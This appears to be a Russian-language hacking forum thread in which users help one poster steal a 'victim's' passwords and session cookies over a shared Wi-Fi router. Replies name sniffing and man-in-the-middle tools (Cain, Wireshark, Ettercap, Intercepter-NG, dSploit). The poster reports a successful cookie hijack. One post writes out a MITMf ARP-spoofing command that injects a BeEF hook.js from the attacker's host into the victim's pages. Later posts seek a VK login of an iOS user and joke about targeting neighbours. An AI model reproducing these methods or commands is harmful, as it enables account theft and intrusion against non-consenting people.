Всем привет. Нужно слить пароль/куки с компа жертвы. Весь траффик проходит через роутер, к которому у меня есть доступ по воздуху (и скорее всего к его интерфейсу, роутер TP-Link). Я имею ноут с вин 8 и кали линукс, а так же желание.

Юзай http://comax.fr/yamas.php в Kali Linux

не, жертва сидит на куках, а не входит/выходит, так что это не сработает

должны же быть более существенные методы, при имении полного доступа хотя бы к тому же роутеру, может можно подменить траффик или че то типа того.

http://comax.fr/yamas.php + Wireshark?

Ettercap + Wireshark?

Насколько я знаю, android мобила в связке с http://4pda.ru/forum/index.php?showtopic=243228 или http://4pda.ru/forum/index.php?showtopic=262107 должна справиться

Да, ,возможно но они достаточно лагучие ибо не обновлялись туеву хучу лет. В любом случае спасибо за ответы, завтра протестирую у себя и отпишусь.

Отпишись о результате, тоже интересно.

Воу спасибо за программку, щас пойду ломать соседнюю тяночку

Отлично работает под виндоус связка Cain+Wireshark+EditThisCookie. Сейчас быстренько поставлю кали и буду под ней тетировать более эффективный способ. Если что, обращайтесь за подробностями.

сюда подробности выложи, будет интересно почитать

1 способ (под виндой) тут.

В лабораторных условиях все сработало на ура, в поле вышел фейл-жертва не вышла на связь.

2 способ (линукс) еще не полностью проверил, в принципе вот он.

Позже отпишу о конечном результате, если есть вопросы по теме-задавайте.

dsploit + intercepter

Напишу репорт о работе в поле.

Короче как и предполагалось куки я захавал, обработал на страничку попал, все это заняло примерно минуты 3.

Теперь о минусах: куки завязаны с ip, то бишь работать с ними можно только на месте, домой вы их не унесете. Насколько я понял, так можно сделать только с теми куками, которые мы получили сразу после авторизации "жертвы". Это реально в тех же макдаках и т.п., а т.к. я ловил свою "жертву" на ПМЖ, то такое вряд-ли прокатит, ну либо надо поседеть пару суток. Плюс ко всему жизнь этих "кук" истекает после нажатия жертвой кнопки "выход".

Вывод: способ довольно малоэффективен. При наличии моих ресурсов можно придумать что-нибудь более эффективное, но т.к. я в этом вопросе относительно дилетант, то хз.

Дак, не хорошо у друзей тырить. Ладно бы у соседей, то пожалуйста.

Не забывай, что человек может авторизоваться куда нибудь еще. Пароли могут совпадать и т.п. Включи ты фантазию наконец.

Цель была не стырить, а по практиковать полученные знания на будущее.

вк через https работает, так что скорее всего ничего не получится.

Вообще-то всё можно обойти. /threads/345266/

а то, что все получилось и я уже об этом писал-это ничего, да? хттпс обходиться как два пальца (пост выше, + я видео гайд кидал). в моем случае все прошло гладко и без этого.

MITMF+cobalt+beef

смысл такой.

делаешь митм атаку с инжектом в страницу. получаешь некий доступ к жертве, дальше подсовываешь её что-то , или же рыскаешь на наличие сплоитов, в любом случае это лучшее решение. Но есть некторые нюансы

А можно подробнее? А то я о такой связке не слышал, да и шарю пока не ахти.

Всё в кали

запускаешь BEEF ДАЛЕЕ В КОНСОЛЕ КОПИРУЕШЬ сылку твой it:3000/hook.js

apt-get install mitmf

mitmf --arp --spoof -gateway 192.168.1.1 -target трой ip --inject js-url твой it:3000/hook.js

про установку кобольта долго объяснять, но этого хватит. если что ЛС. но я бываю редко. Точнее не часто

А если Kali поставить на виртуалку, нужны ли какие нибудь надстройки над windows для полной работы kali?

спасибо всем за советы в теме, тоже актуальной оказалась проблема

Спасибо за информацию. Проги хоть и давно не обновлялись, но потестирую обязательно

вот как раз vk работает по умолчанию по http

Intercepter-ng хватит с головой для такой задачи. Там есть функционал для "убийства" куков и перехвата логина с паролем при последующей авторизации.

Видосов по использованию на ютубе масса)

Может помочь клавиатурный шпион

Конечно же может помочь МВД,отдел "К" ну и господь Бог.И как вариант, подари своей женщине триппер,а она ему!Эдак запусти ему червя....Вот это будет по хакерски!))))

найти другую жену)

Всем привет, нужно узнать логин пароль от вк, жертва сидит только на iOS с оф.приложения. Есть доступ к wifi и устройства на iOS и андроид.

Всё в кали

запускаешь BEEF ДАЛЕЕ В КОНСОЛЕ КОПИРУЕШЬ сылку твой it:3000/hook.js

apt-get install mitmf

mitmf --arp --spoof -gateway 192.168.1.1 -target трой ip --inject js-url твой it:3000/hook.js обьясни по подробней как и что?

Если в локалке ,то лучше чем интерцептор не найдешь снифера.